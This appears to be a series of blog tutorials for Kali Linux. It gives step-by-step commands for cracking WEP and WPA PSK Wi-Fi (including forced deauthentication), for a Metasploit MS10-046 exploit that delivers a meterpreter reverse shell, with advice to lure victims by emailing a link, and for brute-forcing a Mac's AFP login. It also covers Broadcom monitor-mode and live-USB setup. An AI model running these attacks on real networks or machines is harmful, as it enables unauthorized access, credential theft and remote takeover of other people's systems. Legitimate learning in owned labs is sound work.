Cracking WEP Encryption With Kali Linux

In this tutorial we will see how easy it is to crack WEP encryption on a wireless access point. WEP is now very outdated, after it’s easy vulnerability was exposed. However you will still find some access points using WEP, and for educational purposes I wish to demonstrate how easy it is to break, which should encourage you to switch to WPA if you haven’t done so already.

It is also a good starting point for you to learn the basics of how to use airodump-ng and aircrack-ng tools within the terminal window.

I’m using the Kali Linux distribution that comes with these tools already installed. If you haven’t done so already I advise you download and setup a USB live drive running Kali Linux. If you’re a mac user you will find this tutorial useful as I also address the wireless driver issues that frequently plague Mac users trying to run aircrack.

STEP 1
First we will run airodump-ng to scan for available wireless networks and identify one running WEP that we wish to connect to.

As you can see there’s several networks with WEP available, we will target the last in the list. press control c to stop airodump and run the following command
airodump-ng -w <directory to write the file to> -c <channel number> –bssid <MAC of target access point> <wireless interface>

As you can see I am saving the captured packets to a local directory on my system, and I set the channel and BSSID to the channel and bossed indicated in our initial scan. Finally as I am using a mac I have got the prism0 wireless interface which is being used for wireless monitoring. If you’re on another machine I assume you have already enabled monitor mode with the airmon-ng command.

When you hit enter airodump will then begin gathering packets and writing them tot he capture file. You will need to capture around 10,000 IV’s before it will be possible to start cracking the WEP encryption, typically I have found I need around 2,000 IV’s to be successful.

STEP 2
Leave the terminal window open with airodump capturing packets, and start a new terminal window. Here will run aircrack-ng with the following command
aircrack-ng <directory to the capture file>

When you hit enter aircrack-ng will open the capture file and begin to try to crack the WEP encryption. If successful it will display the result in Hexadecimal code. If it’s not successful it will indicate not enough IV’s have been captured. Simply leave the window open it will automatically retry when the next 5k IV’s have been captured.

When you finally have captured enough IV’s it will display the successfully cracked password in Hexadecimal format. You can use an online converter tool to convert this to ASCII characters if you wish, or enter the HEX without the : separators.

Windows Attack With Metasploit Tutorial

In this tutorial we will be exploiting a vulnerability within windows related to the icon_dllloader. This will allow us to deliver the meterpreter payload which gives us access to the target machine and would allow for us to run a key logger service for example.

PREREQUISITS
In order to begin this tutorial you should already be familiar with the basics of the Metasploit framework. If you don’t already know how to start the database service and get the Metasploit console operational then I advise you to checkout my introduction to Metasploit tutorial here.

STEP 1
After you have started Metasploit with the msfconsole command we will load our intended module with the following command
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

STEP 2
Once we have loaded the module, we will set the payload that we intend to deliver. We are going to use the meterpreter reverse_tcp payload. We will load this with the following command
set payload windows/meterpreter/reverse_tcp

STEP 3
Now we will set the options for the parameters we need to define in order for our attack to function. We need to set the SRVHOST and the LHOST. For these we will set them to to the IP address of the machine we have running metasploit. In this example we are in the same LAN as the target machine so we will use our LAN IP address. If you were targeting a remote machine via the internet for example, then you would need to point this to the public WAN IP address of your router and have some forwarding setup to the metasploit machine. For ease of demonstration however we are attacking a machine in our own LAN, so we will use the local network IP address.
set SRVHOST 192.168.0.8
set LHOST 192.168.0.8

Once we have set these you can use the show options command to display the settings to make sure everything is set correctly.

STEP 4
Now everything is setup we are ready to Rock ‘n’ Roll and start our exploit. Use the command exploit to begin.

You can see that everything has now been setup, and the server has been started. This is running now as a background job, so simply leave the terminal window open and we wait.

Wait for what?? Well, you now need to get the target machine to run the vulnerability in their operating system to allow metasploit to make the connection. As you can see the terminal window has given us some hints. One easy way is to get the target machine to click on the given URL http://192.168.0.8:80/. You could send an e-mail containing a hyperlink in the hope that the receiver will click on this. Once they do, and assuming there’s no antivirus running on their machine, it will allow you to make a connection to meterpreter and gain access to take control of their machine.

Metasploit afp Exploit Mac OSX Login

In the previous tutorial I took you through the process of setting up metasploit and identifying target machines on our target network. In this tutorial we are going to continue from where we left off. If you didn’t follow the previous tutorial, then I assume you are already familiar with how to get msfconsole and metasploit up and running and identify the target machine.

We are in this tutorial going to target a mac OSX machine running on our network with IP address 192.168.0.10. Metasploit showed us that it found the afp service running on this machine, and gave us several possible exploits we could execute. If you don’t know how to get this far please refer to the previous tutorial.

We are going to run the afp_login module in this tutorial to try and crack the password for the machine.
info auxiliary/scanner/afp/afp_login

This gives us lots of details and options for this machine. It will use a brute force method so it can take some time. It works by running a list (dictionary) of usernames and passwords against the machine in order to find the correct login details. The more information you have on the target machine the faster this will be. If for example you have a text file that contains a list of all the usernames for all the computers in the network, that would be a good starting point. In our case, we gathered some intelligence in the previous tutorial, and found the computer is called Lucy’s mac mini.This gives us a good starting point, we can safely assume the login name would be “lucy”. However we don’t know the password for this machine. So we have a few options. Again we may have somehow acquired a list of passwords used within the company, or maybe we have some knowledge of the target and have made our own list of passwords. This list of passwords is simply a text file in which each line of the file contains a new password. In this case, I know from my research about the target some possible password combinations and created a text file with these passwords.

 

Now we need to load this module, so go ahead and run the following code :-
use auxiliary/scanner/afp/afp_login
show options

The show options command gives us a list of all the options, and which are mandatory. We are going to feed the module with the following information

• USERNAME this will be our assumed username for Lucy’s machine
• PASS_FILE this is our text file that contains the list of potential passphrases
• RHOSTS this is the IP address of the target machine

set PASS_FILE /root/Documents/passwords
set RHOSTS 192.168.0.10
set USERNAME lucy
show options

You can see that the options we just input are now shown in the “current setting” column. This verifies that we are ready to execute the program.
exploit

The exploit command will start the program running. metasploit will connect to the target machines IP address and begin to brute force the login for the username “lucy”. You can see in the console window as each password from our passphrase file is tried. The “LOGIN SUCCESSFUL” indicates that the correct username and password combination is “lucy:lucy2014”

SUMMARY
This is a simple attack that can be run using metasploit. Metasploit is capable of gaining access tot he target machine and you being able to take control, or leave behind a payload such as a key logger for example. We will cover these more advanced attacks in later tutorials.

This tutorial was able to give you a good introduction to the afp module and how to exploit it in order to crack via brute force the login details for the target machine running MAC OSX. The time taken to crack the password really depends on how much data you have been able to gather beforehand. If you can create a list of potential usernames and passwords then it will certainly give you an advantage. If you don’t have a clue for the passphrase options there are some pre made dictionaries with millions of possible common passwords. This “stab in the dark” is only successful around 30% of the time however, so the more details you have beforehand the better.

Getting Started With Metasploit On Kali Linux

Metaspolit is a very powerful tool that will allow you to exploit certain vulnerabilities within target machines. It comes already installed on Kali Linux, but there’s a few things you need to do at the command line before you can get started.

PREREQUISITES

1. You should have a Linux Live drive boot already
2. You should have a connection to a LAN or WAN
3. Know the IP address range of the network you are targeting

In this tutorial we will be exploiting the afp module for a macintosh computer running on our LAN. We will use the afp_server_info module in metasploit to find out more details about our target machine.

STEP 1
The first step is to find out information about our target network. Run an arp scan on the network you are targeting. with the following command
arp-scan 192.168.0.1/24
You can change the IP address range to match the network you wish to scan. After running this you will be presented with all the devices connected to the network.
You can see that we have several devices connected to our network.

Next we will find out what services and ports are open on which machines using nmap :-
nmap -sS -A 192.168.0.1/24 -v

After running this scan you will be able to look at the results and identify the IP address of a machine that has several open ports. These open ports are what we will use to exploit, so the more ports a specific machine has open the better. Once you have identified this we will run one final scan on the specific target machine :-
nmap -sS -A 192.168.0.10 -vv

STEP 2
Now we have identified our target machine we can setup our database which will be used by metasploit. Open up a new terminal window and run the following :-
service postgresql start
su postgres
createuser nick -P
createdb msfproj2 –owner=nick
exit
(choose your own username and database name and password)

STEP 3
Now we are ready to start the metasploit program by running the msfconsole command

Once msfconsole is loaded, we need to connect to the database we just created.
db_disconnect
db_connect nick:<your password>@localhost/<your db name>

Now we need to setup a new workspace.
workspace -a newproject
workspace “newproject”

To check that everything is setup properly run :-
db_status
workspace

The results of these two commands should show that your postgresql is connected to the correct database.

STEP 4
Now we have metaspoilt setup and connected to our database we can run nmap again on our target network, but this time it will write the results to be saved into the database :-
db_nmap -sS 192.168.0.1/24 -vv

Once the scan is complete we can run the command hosts to be shown a list of devices connected to the network.

the services command will display all the services that are running on the network which we can exploit. When you find a service you want to exploit, you can check if metaspoilt has any exploits for this service by using the search <service name> command

In this case we have identified the afp service that we wish to exploit. There are several modules for afp that we can use.  We are going to do a very basic “attack” to gain more information about the computer on the network.
use auxiliary/scanner/afp/afp_server_info

after loading this module, we need to view the options. show options  command will do this for us. You can see that it also lists which of these options are mandatory under the “required” column. In the case of the afp_server_info module all options are required. Two are already filled in by default. Check that the port matches the port that was listed under the services list. If this is already setup OK, we only ned to add RHOSTS which will be the IP address of the target machine, of a range of IP addresses. We are targeting machine 192.168.0.10 so we will run the command set RHOSTS 192.168.0.10

We are now finally ready to run the module, simply use the command run or exploit and the module will run giving it’s results as shown below.

The above shows details about our target machine, it’s network/server name, the type of machine etc. This information can be useful for us when planning further penetration attacks on this machine.

SUMMARY
So that’s a very brief and basic introduction to metasploit framework. It covers just a fraction of what this very powerful program is capable of doing. In later tutorials we will be going deeper into metasploit and what it can do. In the next tutorial we will be doing another function with the afp exploit to crack the password for the user.

Cracking WPA PSK With Kali Linux On Macbook

If you are running this on a Macbook and are having troubles putting the wireless device into monitor mode, then you need to follow my previous tutorials regarding this. If you’re running this on another machine then chances are you can use the airmon-ng start wlan0 command to switch to monitoring mode.

For the rest of this tutorial I will assume we are working on a macbook pro and that the wireless monitoring device is called prism0. 

STEP 1

• Check that you have monitoring mode enabled. Run ifconfig or iwconfig to check on this.
  
• In the above screen shot you can see that we have the prism0 wireless device. This is our monitoring mode device on the macbook.

STEP 2

• Run airodump-ng with options to write to a captured file. We will name this capture file “capture”
  
• Once airodump is running, we need to identify which wireless network we wish to crack. For this tutorial we are looking for a WPA type with a PSK. I’ve setup a wireless network for us to crack with these requirements, you can see two in the below screenshot. We need to run airodump until we have captured a WPA handshake. Once a handshake has been captured it will show in the top row, as illustrated below. (This means waiting for someone to connect to the access point. If you don’t want to wait you can force a de-authentication of a device connected to the network and hope they reconnect)
• If you wish to make a forced disconnection in order to capture the handshake you can execute the following :-

   aireplay-ng -0 1 -a 3C:DF:A9:68:E6:56 -c 60:03:08:64:D5:C3 prism0
  
  where -a is the mac ID of the base station and -c is the mac ID of the device you wish to de-authenticate.

STEP 3

• Once you have captured a handshake packet on the access point we wish to hack you can proceed to the next step, which is cracking the password. We are using a brute force method, which can take some time, but basically means running through a dictionary of words and finding which works. This can take hours, and there’s no guarantee that the password is in your dictionary. There’s many free online dictionaries in .txt format you can use. For the purposes of testing however you can use a password that you know is in your dictionary as we are just doing this for a learning experience.
• Run aircrack-ng and you will see a list of options. We need to input two options, the first is the BSSID of the network you wish to crack, the other is the path to the dictionary you will be using.
• Finally input the path to the capture file.
  aircrack-ng -b 3C:Df:A9:66:E6:56 -w /root/Documents/Dictionarys/passwords.txt /root/Documents/CapturedPackets/capture-01.cap
  
  
• After hitting enter if everything is done correctly aircrack will begin running through the dictionary. Now it’s just a matter of waiting until it finds the correct password
  
• Here’s the final cracked password
  

How To Enable Wireless Monitoring Macbook Pro

One headache people often come across when setting up wireless cards on their macbook with Linux apart from actually getting it working (see this post for help on that) is enabling monitoring mode.

By default the broadcom drivers don’t allow the wireless network card in the macbook (and I assume other Mac variants) to be put into monitor mode. This is particularly frustrating when you need to run airodump-ng for example to capture wireless packets.

There is however a solution for this that I have discovered, you simply need to execute the following command at the terminal

echo 1 | sudo tee /proc/brcm_monitor0

After this if you run the ifconfig command you will see a new wireless device is listed prism0. This is your monitoring device for your wireless card. So when you run airodump-ng for example, rather than using mon0 as the interface you will substitute it for prism0

To test this is working run airodump-ng prism0 command in the terminal. You should then see the wireless networks and the packets being collected like this :-

And there you have it, your broadcom wireless card on a macbook pro 2014 model up and running with monitor mode enabled. Enjoy!

Note, you will need to run this terminal command to setup prism0 after each reboot, even with persistence enabled.

Kali Linux Broadcom Wireless on Macbook

After setting up your Kali Linux USB Live Drive with persistence, there’s one final step that usually provides a major headache for Mac users, the Wifi. It took me many many hours of searching and trying different things and learning to come up with a concrete solution, like a detective piecing together the threads of information I could find.

One big drawback it seemed was that those who had managed to get things working weren’t able to put the WiFi into monitor mode, effectively making airodump-ng and other Wireless cracking/hacking tools useless, as you could not monitor and collect packets of data from the WiFi traffic.

Thankfully though I was able to find the solution for this as well.

This is confirmed as working 100% on my Macbook Pro (Mid 2014 model). The model you have of Macbook (or Mac Mini or macbook air etc) will determine exactly what broadcom chipset you have. You can find out what exact chipset you have by using the lspci command at the terminal window. You will get a list of all pci devices connected to your system. Look in the list to find your broadcom device. On my mid 2014 model Macbook Pro the device is BCM4360

STEP 1

• First you need to boot up into your Kali Linux Live Drive with persistence turns on and configured correctly (otherwise you will need to do this procedure overtime you boot up if you don’t have persistence configured correctly). Also you are going to need internet access, so you will have to most probably plug in a thunderbolt Ethernet adapter so you can gain access online during this procedure.
• If you run the ifconfig and ifconfig commands in your linux terminal you will see only your ethernet and loopback devices listed, no wireless Lan.
  
• In terminal run the following commands to update your Linux installation
  • sudo apt-get update
    
  • apt-get install linux-headers-$(uname -r | sed ‘s,[^-]*-[^-]*-,,’) broadcom-sta-dkms
    
• After the above two commands have run (they take a few minutes each to complete, as the updates need to be downloaded and installed) you will need to run the following commands to remove the possibly conflicting drivers which come with Debian.
  • mod probe -r b44 b43 b43legacy ssd brcmsmac
• After this you are good to go with he following command
  • mod probe wl
• Now if you run the ifconfig and iwconfig you should see the wireless card is now listed
  
• Open up the network settings of Kali Linux and you should find you are now able to connect to wireless networks. Once connected, disconnect your ethernet cable and run the following in terminal
  • ping google.com
• If the ping returns are good then your wireless connecting is working!

STEP 2

• That’s just the beginning, now you have this working but you will not be able to switch the wireless adapter into monitor mode when trying to perform any wireless cracking techniques. If you try putting the wlan0 device into monitor mode it fails like this.
  
• This was one of the most difficult parts to puzzle out but here is the correct working method. You will need to run this command EVERY TIME you reboot, I haven’t figured out yet how to make this persistent.
• In terminal type the following :-
  • echo 1 | sudo tee /proc/brcm_monitor0
• This will now create a new wireless interface called prism0 which you can see if you run the iwconfig command in terminal. It is the prism0 adapter that you will be using for your wireless attacks as it has monitor mode enabled.
  
• Now, there’s no need to run airmon-ng, the prism0 device is already your monitoring wireless lan. You can run airodump-ng to test that everything is working properly
  • airodump-ng prism0
    
    

Quick and easy Linux USB Live drive for Mac OSX

In my last post I went through the details of partitioning and setting up your Linux USB live drive with persistence, specifically for Kali Linux.

If you’re already familiar with partitioning the drive then you can continue, if not I advise you to check my previous posting and come back here later.

So I am assuming you already have a FAT partition on your USB thumb drive that is around 4GB in size. All you need to do now is download the file at this link. These files are what is created by the free tool “Mac Linux USB Loader”

After you extract thee files, copy the whole root folder (titled efi) to your USB drive partition. Inside the efi folder, is another folder called boot. Inside this you you will find several files. All you now need to do is download the Kali Linux .iso image file. Rename the downloaded file to be “boot.iso” and then copy this inside the boot folder on the USB thumb drive. That’s pretty much all there is to it, go ahead and reboot your mac holding down the option key and you should have the efi boot menu as an option from where you can boot into your Linux distribution.

In theory this will work with any Debian based Linux (such as Ubuntu for example). You just follow the same procedure. There will be some manual editing required to the enterprise.cfg file so that the correct Linux distribution name is displayed but this is easily done within text edit on OSX.

In the files that I have provided the enterprise.cfg file has been edited already to allow for persistence booting of Kali Linux, so that the changes you make and files you create are saved for the next session. However, in order to make this function work there are a few procedures you need to follow in addition to the above. This involves creating a new partition for storing the persistence data on, and creating a mount point for this. All of this procedure can be found here.

The video below also gives a comprehensive overview of setting up the Kali Linux USB Live Drive as well as partitioning the disk correctly and configuring the persistence partitions.

REFERENCES :-

http://docs.kali.org/downloading/kali-linux-live-usb-persistence

https://sevenbits.github.io/Mac-Linux-USB-Loader/

Kali Linux USB With Persistence On Mac

Getting Kali Linux, or any other Linux distribution, up and running on your Mac can sometimes be problematic. Although things have gotten easier with some new tools. As a Macbook Pro user (mid 2014 model) I wanted to be able to use Kali Linux on my Macbook in a USB liveboot mode, with persistence. One primary reason for wanting to maintain persistence is that there is quite a bit of setup involved to get all the drivers working, and I didn’t want to have to go through all of that each time I booted into Linux.

I tried many methods of getting things working, even following the instructions on the Kali Linux website didn’t work exactly. I ended up with a strange occurrence when rebooting that I had to select the windows partition for boot rather than the mac EFI. Below are my instructions on how I set up this live USB with persistence, it’s produced reliable results and hopefully it will do for you to. The process was done using my Macbook Pro mid 2014 model, running OSX El Capitan.

There’s a few things you will need in order to get started.

1. A USB stick with minimum of 8GB storage (I’m using a 16GB scan disk USB3.0 thumb drive)
2. Download the free software “Mac Linux USB Loader” from here https://sevenbits.github.io/Mac-Linux-USB-Loader/
3. Download the latest build of Kali Linux (I use the amd64 version) and keep the .iso file in your downloads folder

STEP 1

• First we need to prepare the USB stick. We will use the MAC OSX native disk utility tool for this. Open the Disk utility tool, and select the correct USB device (in my case SanDisk Cruzer…..)
  
• Click on “Erase” and choose the following options
  • Name – Kali Linux
  • Format – MS-DOS (FAT)
  • Scheme – Master Boot Record
    
• Press the “Erase” button. The Disk Utility will then run through it’s formatting process. When finished click on “Done“. You should now have a single clean partition on your USB drive as shown below.
  

Now the USB disk has been prepared we can move onto the next step, which will be to setup the drive using the “Mac Linux USB Loader“.

STEP 2

• Open up the Mac Linux USB Loader software and select “Create Live USB“. This will bring up a finder window, where you can navigate to your downloaded Kali Linux.iso disk image. Select the Kali Linux disk image that you downloaded earlier.
  
• On the next screen you will see your USB thumb drive listed with he name “kali Linux” (if you named it that when formatting). Select this USB drive and click “Next”
  
• On this screen click on “Begin Installation“.
• Once this has completed, you should now find a directory structure on the USB disk like this :-/efi/boot inside the boot folder there will be a couple of .efi files and a “boot.iso” disk image.
  

STEP 3

• There’s one final step we need to take in order to ensure that Kali Linux boots in persistence mode every time. We need to edit the enterprise configuration file. Open up the Mac Linux USB Loader again, and select the option “Setup USB Device“.
  
• In the new window, select the Kali Linux USB drive from the left side. This is a list of the various available bootable USB drives. Once the correct drive is selected click on “Edit Enterprise Configuration File“. This will open a text edit window with the configuration file. You need to change the “hostname” from “kali” to “kali persistence“. Save this file, and close.
  
  
• Your USB bootable disk is now ready. Reboot your Macbook Pro while holding down the “alt / option” key. You will be presented with a boot option list, select the “EFID” boot option. This will present another menu where you can select the boot mode, and the available Linux Distributions. Kali Linux should then boot up and now you have a Linux Live session running on your machine. There’s now just one more thing we need to do in order to setup persistence and make it work correctly.

STEP 4

• We will use Linux tools to resize the partition. You can use the GUI tool “GParted” or it can be done through the terminal. Here’s the terminal commands :-
  • end=7gb
  • read start _ < <(du -bcm kali-linux-1.0.8.amd64.iso | tail -1); echo $start
  • parted /dev/sdb mkpart primary $start $end
• after the parted process has finished there will be a new partition created at /dev/sdb3. You can verify this with the “disk -l” command to list all available drives.
• Next we wil create a ext3 filesystem in the new partition. the filesystem will be labeled “persistence”. The terminal commands are as follows :-
  • mkfs.ext3 -L persistence /dev/sdb3
  • e2label /dev/sdb3 persistence
• Next we will create a mount point for the new partition and then create the persistence configuration file, finally we will then unmount the partition. Here’s the terminal commands :-
  • mkdir -p /mnt/my_usb
  • mount /dev/sdb3 /mnt/my_usb
  • echo “/ union” > /mnt/my_usb/persistence.conf
  • umount /dev/sdb3
• We are pretty much done! All that remains now is to reboot (using the option key again to boot into Linux). Once into Kali Linux create a new folder on the desktop, or a file in the documents folder. Reboot again, and check that it’s still there. If so then congratulations you’ve done everything right and you now have a live bootable USB drive running Kali Linux in persistence mode on your Macbook Pro.

Now all that remains is to get the Wireless adapter working. This is by far the most difficult part of the whole process, the broadcom drivers for Linux aren’t well supported, and depending on the model year of your Macbook Pro will depend on what chipset version and driver you need.

References :-

[Guide] Mac OS X Lion: How To Boot A Linux Live System From An USB Drive & How To Update Any OCZ SSD’s Firmware [Updated]

http://www.makeuseof.com/tag/how-to-boot-a-linux-live-usb-stick-on-your-mac/

http://docs.kali.org/downloading/kali-linux-live-usb-install

http://docs.kali.org/downloading/kali-linux-live-usb-persistence